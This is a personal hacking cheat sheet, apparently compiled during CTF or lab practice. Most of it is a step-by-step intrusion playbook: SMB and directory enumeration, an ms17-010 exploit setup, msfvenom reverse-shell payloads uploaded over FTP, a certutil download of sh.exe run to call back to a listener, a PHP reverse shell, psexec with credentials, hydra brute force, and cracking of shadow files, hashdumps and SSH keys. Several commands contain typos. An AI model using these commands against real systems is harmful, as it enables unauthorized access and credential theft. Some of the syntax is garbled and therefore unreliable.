Hacking Tools & Notes

smbclient -L \\$ipanswer\
- – add directories after \\$ipanswer\tmp, or \\$ipanswer\ADMINS
- – attampts to connect with smb
- – try no password…
enum4linux
- – enum4linux -a 10.10.14.36 | tee enum4linux.log.txt
- – this usually screws up, but might be worth a try
unshadow
- – copy thge /etc/passwd – paste to gedit or txt
- – unshadow passwd shadow – will print an unshadowed file – use for hashcat
hashdump (meterpreter)
- – once pwnd, use hashdump to break passwords with hashcat
\ Win 7 7601 SP1\ is a dead giveaway for MS17 SMB vulnerability
- – use msfconsole (metasploit), search ms17-010
- – use auxiliary/scanner/smb/smb_ms17_010
- – set standards
- – set payload windows/x64/meterpreter
- – set payload windows/ to see more
- – can also google \ Autoblue\ and see some GitHub stuff
dirbuster&
- – this GUI uses a wordlist to find directories
- – dirb and gobuster are a couple others to use
- – depending on the system, certain file types should be specified
- – .asm, .aspx, .php, .txt, .zip, .bak, .rar… etc
gobuster
- – gobuster -w /opt/DirBuster-0.12/directory-list-2.3-medium.txt -u 10.10.14.36
- – just like dirb or dirbuster
dirsearch
- $ dirsearch -u http://<target_IP>:<port> -e php -x 400,404
find
- $ find / –perm /4000 –type f –exec ls –ld {} \; 2>/dev/null
- this is good to find files with SUID bit set
ftp $ipanswer
- – try as anonymous
- – try putting a file somewhere
- – put dog.jpg
- – use msfvenom to create a malware, and upload…
msfvenom -p windows/meterpreter/reverse_tcp
- – LHOST= LPORT=4444 -f aspx > ex.aspx
- – LHOST= LPORT=4444 -f exe > sh.exe
- – LHOST= LPORT=4444 -f war > shell.war
- – 32 or 64 bit system matters…
- – p is for payload, f is for file output
- – put using ftp, or upload through a vulnerable page
- – msfconsole – use a handler to listen for the connection
- – set payload windows/meterpreter/reverse_tcp
- – run on vulnerable machine – http://$ipanswer/ex.aspx
- – use payloads for any type of configuration file (.war, .ini, etc…)
- – use netcat (nc -nvlp 4444) to listen for it
background (metasploit)
- – if there’s an open connection, you can background a session
- – get back to it with \ set session #\
suggester (metasploit)
- – use post/multi/recon/local_exploit_suggester
- – set standards
meterpreter
- – set lhost tun0 – easy way of saying set LHOST=
- – common commands once on a system:
- – getuid
- – sysinfo
- – pwd
- – history
- – whoami
- – ls -alh
- – uname -a
- – look for script online called \ LinEnumj.sh, and linuxprivchecker.py\
- – touch – create file
- – getsystem
- – migrate
netcat – nc -nvlp 4444
- – a listener waiting for a payload to call back
- – can use windows/shell/reverse_tcp as a payload and wait
BurpSuite
- – [PROXY TAB] –> [OPTIONS TAB] – shows how you intercept traffic
- – Browser –> manual proxy –> 127.0.0.1 –> port 8080 –> all protocols
- – Burpsuite – turn intercept on and off
- – use the \ Forward\ button to see the page reload
- – right click on returns –> send to TOOLS as needed
- – REPEATER, INTRUDER, DECODER – some of the other tools
- – Brute Force – can highlight a section to set it up for changes
- – [PAYLOADS TAB] – put list into ‘Payloads Options [simple list]’
- – uncheck the URL-encode at the bottom of page
- – click Start Attack – look for indicators that it worked
bash scripting
- – use to convert a list to Base64 as an example
- – echo -n ‘tomcat:tomcat’ | base64 (this converts to base64)
- – example: for cred in \$(cat tomcat.txt); do echo -n \$cred | base64; done
- – common commands:
- – arp -a
SimpleHTTPServer
- – python -m SimpleHTTPServer 80
- – gives access to wget and others
- – can use specific Windows commands to do a wget equivilant
Wget for Windows:
- – c:\Users\Administrator\Desktop\flags> add command after this prompt
- – certutil -urlcache -f http:///sh.exe c:\users\administrator\desktop\flags\sh.exe
- – once in a shell, run the sh.exe to reach out to your listener
Wapalyzer – for browsers
- – install for enumeration
fuzzysecurity.com
- – bible of priv esc
psexec.py / wmiexec.py / smbexec.py
- – psexec.py pentest:’P3nT3st!’@10.10.10.152
- – located in the /opt/impacket/ folder
- – installed with git clone, and then pip install .
- – this was shown on the TCM course
- – good when you’re up against antivirus, and before meterpreter (detectable)
linpeas.sh
- – ./linpeas.sh | tee linpeas.log.txt
- – a great script to check a machine from the inside
- – look for red
GitHub Suggester
- – python windows-exploit-suggester.py –database mssb.xls –systeminfo sysinfo.txt
- – look for Sherlock (depricated now) or Watson
- – syntax is on the GitHub site
- – the sysinfo was gotten after shell access; typed systeminfo
PHP-Reverse-Shell
- – put this on a computer you have access to upload to
- – you’ll probably have to google for it, but it’s popular and easy
- – change the lport and lhost options
- – python -m SimpleHPPTServer 80 – to upload the revers shell
- – make sure you set up netcat (nc -nvlp 4444)
Spawn a TTY shell
- – sometimes users don’t have access to TTY
- – google Spawning a TTY Shell
- – netsec is a great resource for this (google results)
- – example script: python -c ‘import pty; pty.spawn(\ /bion/bash\ );
hydra
- – hydra -l jan -p /opt/rockyou.txt ssh://10.10.14.36
- – this will brute force into a service like ssh or ftp
JohnTheRipper
- – /opt/JohnTheRipper/run/ssh2john.py kay_id_rsa > forjohn.txt
- – /opt/JohnTheRipper/run/john forjohn.txt –wordlist=/opt/rockyou.txt
- – will need to change the item to a format that john can use
- – this one uses ssh2john… there’s also ftp2john, etc…